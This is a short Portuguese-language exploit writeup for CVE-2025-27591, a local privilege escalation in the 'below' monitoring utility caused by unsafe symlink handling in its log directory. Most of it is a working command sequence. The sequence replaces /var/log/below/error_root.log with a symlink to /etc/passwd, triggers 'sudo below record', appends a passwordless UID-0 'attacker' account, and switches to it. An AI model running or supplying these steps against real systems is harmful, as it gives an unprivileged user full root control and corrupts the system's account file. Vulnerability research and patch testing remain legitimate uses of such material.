
Exploit de escalada de privilégios local para CVE-2025-27591, abusando do tratamento inseguro de symlinks no registro do utilitário abaixo para sobrescrever arquivos arbitrários como root.
A CVE-2025-27591 é uma vulnerabilidade local de escalação de privilégios no utilitário below (versões anteriores à versão corrigida) causada pelo tratamento inseguro de links simbólicos dentro do seu mecanismo de registro de logs. Atacantes com acesso local podem explorar essa falha para sobrescrever arquivos arbitrários como usuário root, levando à escalação total de privilégios.
A ferramenta below grava logs em /var/log/below/ sem validar adequadamente links simbólicos. Ao pré-criar um link simbólico apontando para um arquivo sensível (por exemplo, /etc/passwd), um atacante pode injetar conteúdo arbitrário com privilégios elevados quando o processo vulnerável é executado sob sudo.
# Verifica se o diretório de logs existe
test -d /var/log/below && ls -ld /var/log/below
# Remove o arquivo de log existente e cria um link simbólico malicioso
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# Prepara entrada maliciosa no passwd
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# Aciona o comportamento vulnerável usando sudo
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# Alterna para o usuário recém-criado com privilégios de root
su attacker
A exploração bem-sucedida concede privilégios de root a um atacante local sem privilégios, permitindo o comprometimento total do sistema.
/var/log/below/.